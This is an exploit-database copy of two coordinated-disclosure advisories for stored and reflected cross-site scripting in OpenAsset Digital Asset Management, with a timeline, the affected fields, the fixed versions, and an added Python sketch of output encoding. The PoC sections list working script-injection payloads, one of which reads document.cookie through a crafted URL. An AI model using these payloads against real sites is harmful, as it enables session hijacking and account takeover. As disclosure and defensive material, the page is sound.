OpenAsset Digital Asset Management Cross Site Scripting

CVE: CVE-2020-28857
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-12-14
CPE: cpe:cpe:/a:openasset:digital_asset_management
CVSS: CVSS:4.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
EPSS: 0.0210863
EPSSP: 0.45068


Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020120100

Below is a copy:

OpenAsset Digital Asset Management Cross Site Scripting
Title: Stored cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.23 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28857

Author: Jack Misiura from The Missing Link 
Website: https://www.themissinglink.com.au


Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication

 

1. Vulnerability Description

The OpenAsset Digital Asset Management web application allowed for stored cross-site scripting attacks against various parameters and endpoints. Vulnerable parts of the web application include:

* System Preferences
    * Project Code regex field
    * User name regex field
    * Password regex field
    * All three description fields
    * First Album Name field
    * Visit Items Per SOAP request field
* Categories description
* Keywords, triggered on deletion attempts
* Editing photographer name
* Access token name
* Web share name

 

2. PoC

 

For system preferences fields, the following payloads can be used:

 

" autofocus onfocus="alert('Stored XSS');" abc="

"><script>alert("Script stored XSS");</script>

 

For categories description:

 

Category Name Goes Here<script>alert('Description stored XSS');</script>

 

For keywords:

 

Delete Me<script>alert(1234);</script>

 

Photographer name:

 

John Smith<script>alert("XSS Attack!");</script>

 

Access token name:

 

TokenName"><script>alert("Stored XSS Tokens")</script>

 

Web share name:

 

Share<script>alert("Stored XSS Web Share Name");</script>

 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.

 

4. Advisory URL

 

https://www.themissinglink.com.au/security-advisories

 

--------

Title: Reflected cross-site scripting (XSS)
Product: OpenAsset Digital Asset Management by OpenAsset
Vendor Homepage: https://www.openasset.com/
Vulnerable Version: 12.0.19 (Cloud) 11.2.1 (On-premise)
Fixed Version: 12.0.22 (Cloud) 11.4.10 (On-premise)
CVE Number: CVE-2020-28859
 
Author: Jack Misiura from The Missing Link 
Website: https://www.themissinglink.com.au

Timeline:
2020-11-14 Disclosed to Vendor
2020-12-04 Vendor releases final patches
2020-12-10 Publication
 

1. Vulnerability Description

 

Multiple reflected cross-site scripting (XSS) vulnerabilities in the OpenAsset Digital Asset Management software allow remote attackers to inject arbitrary JavaScript or HTML via:

* Account recovery/password reset page through the email parameter

* Saved search request, through the id parameter

* Search result request, through both the imageViewId and lpFilterInputId parameters

 

2. PoC

 

Account recovery:

https://example.com/Page/StartAccountRecovery?ok=1&email=test%40test<script>alert(document.cookie)<%2Fscript>.com

 

Saved search request:

https://example.com/AJAXPage/SavedSearch?id=167826"')%3b}%3b}]})%3b</script><script>alert("Reflected%20XSS!")%3b</script>

"');}}}]});alert(123);

 

Search result request:

https://example.com/AJAXPage/SearchResults?imageViewId=A%27%22%3e%3cscript>alert("more+xss+here")%3b</script>

 

3. Solution

 

The vendor provides an updated version (11.4.10) which should be installed immediately. If using the cloud version, the vendor has already updated it.

 

4. Advisory URL

 

https://www.themissinglink.com.au/security-advisories
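
For teams reviewing their own templates against the same bug classes, here is an added example (not OpenAsset's code and not the vendor's fix) of context-specific output handling, exercised with the payload strings quoted in the two PoC sections. The function names are hypothetical, and the page does not say how OpenAsset renders these fields; the sketch assumes a value placed in a quoted HTML attribute, in element content, and in an inline script.

```python
import html
import json
import re

# Constructed sample inputs: payload strings copied or URL-decoded from the PoC sections.
STORED_ATTR = '" autofocus onfocus="alert(\'Stored XSS\');" abc="'
STORED_BODY = "Category Name Goes Here<script>alert('Description stored XSS');</script>"
REFLECTED_ID = '167826"\');};}]});</script><script>alert("Reflected XSS!");</script>'


def render_attr_unsafe(value):
    # Vulnerable pattern: raw concatenation into a quoted attribute.
    return '<input name="pref" value="' + value + '">'


def render_attr(value):
    # html.escape(quote=True) encodes & < > " ' so the value cannot close the attribute.
    return '<input name="pref" value="' + html.escape(value, quote=True) + '">'


def render_body(value):
    # Element-content context: the same encoding neutralises injected tags.
    return "<td>" + html.escape(value, quote=True) + "</td>"


def parse_id(raw):
    # A numeric identifier is validated rather than encoded: ASCII digits only.
    if not re.fullmatch(r"[0-9]{1,18}", raw):
        raise ValueError("id must be a decimal integer")
    return int(raw)


def js_literal(value):
    # Inline-script context: JSON-encode, then escape < > & so that a
    # "</script>" inside the value cannot terminate the script element.
    out = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        out = out.replace(ch, esc)
    return out


if __name__ == "__main__":
    print(render_attr_unsafe(STORED_ATTR))
    print(render_attr(STORED_ATTR))
    print(render_body(STORED_BODY))
    print("var q = " + js_literal(REFLECTED_ID) + ";")
```

The same strings make useful regression-test inputs after upgrading to a fixed version: each affected field should come back encoded rather than as live markup.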

Copyright ©2024 Exploitalert.
